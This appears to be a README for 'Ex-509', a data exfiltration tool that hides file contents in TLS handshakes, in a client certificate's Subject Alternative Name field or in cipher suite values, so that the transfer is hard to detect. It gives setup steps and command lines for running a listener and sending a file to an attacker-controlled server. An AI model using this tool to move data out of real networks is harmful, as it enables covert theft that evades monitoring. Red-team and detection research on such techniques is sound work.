Data exfiltration abusing x509 certificates
In order for a TLS session to be established, some data must first be exchanged between the client and server. These exfiltration techniques take advantage of this, and hide data in the TLS handshake itself. Ex-509 includes two modes of operation: certificate and cipher. In certificate mode, payload data is stored in the Subject Alternative Name (SAN) field of the client certificate. In cipher mode, data is hidden in the cipher suite of the handshake. These are both sent to the attacker's machine before an actual session is established, which makes the exfiltration harder to detect.
Python >= 3.6
Use the package manager pip to install the required libraries.
-
On both the client and server machines, cryptography is required for certificate generation and parsing
-
On the server machine, tlslite-ng is required for more control over the TLS handshake
Each technique has its own standalone client and server
Start listening for connections:
python3 ex-509.pyTo specify a custom certificate, private key, or port number:
python3 ex-509.py --cert [PATH TO CERT] --key [PATH TO KEY] --port [PORT]If no certificate is specified, one will be generated and used automatically
Sending a file to the server:
python3 client.py -f [PATH TO FILE] -i [SERVER IP] -p [PORT]In cipher mode, the cryptography package isn't required by the client, as no certificates need to be created.
Also, due to the size limitations, when transferring a large file in cipher mode, it may be chunked up into several smaller pieces. To easily combine them use: combine